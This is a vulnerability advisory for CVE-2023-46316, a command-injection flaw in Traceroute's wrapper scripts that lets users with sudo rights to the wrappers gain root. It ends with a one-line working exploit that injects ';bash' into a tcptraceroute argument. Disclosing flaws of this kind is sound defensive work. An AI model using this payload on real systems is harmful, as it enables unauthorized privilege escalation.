In Traceroute versions 2.0.12 through to 2.1.2, the wrapper scripts mishandle shell metacharacters, which can lead to privilege escalation if the wrapper scripts are executed via sudo. The affected wrapper scripts include tcptraceroute, tracepath, traceproto, and traceroute-nanog. Version 2.1.3 addresses this issue.
advisories | CVE-2023-46316
Description:
In Traceroute 2.0.12 through to 2.1.2 (fixed in 2.1.3), the wrapper scripts mishandle shell metacharacters, which can lead to privilege escalation if the wrapper scripts are executed via sudo. The affected wrapper scripts are: tcptraceroute, tracepath, traceproto and traceroute-nanog.
Additional infomation:
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 7.3 (High)
A local privilege escalation was identified in wrapper scripts provided by the Traceroute for Linux package (https://sourceforge.net/projects/traceroute/). The wrapper scripts do not properly sanitise the user's input, which is taken as parameters and passed into the traceroute command. The user can inject a semicolon (;) into any of the parameters of the affected wrappers, and the wrapper will treat the text following the semicolon as a new operating system command.
The scripts require the user to have raw socket access in order to function as intended. It is common for low-privilege users to be granted sudo root permissions to run the wrapper scripts as opposed to setting "cap_net_raw" capabilities to the binary, or through the use of "icmp dgram" sockets. Thus any user on the local machine can escalate their privileges to root, with the only Attack Requirements (AT in CVSS 4) being that they have sudo root permissions to execute the vulnerable wrapper scripts.
The vulnerable wrapper scripts have been provided since version 2.0.12. Distributions such as Debian 12, Fedora 38, Centos 8 and Amazon Linux 2 include these wrapper scripts with default installations.
Exploitation:
sudo tcptraceroute localhost ";bash"
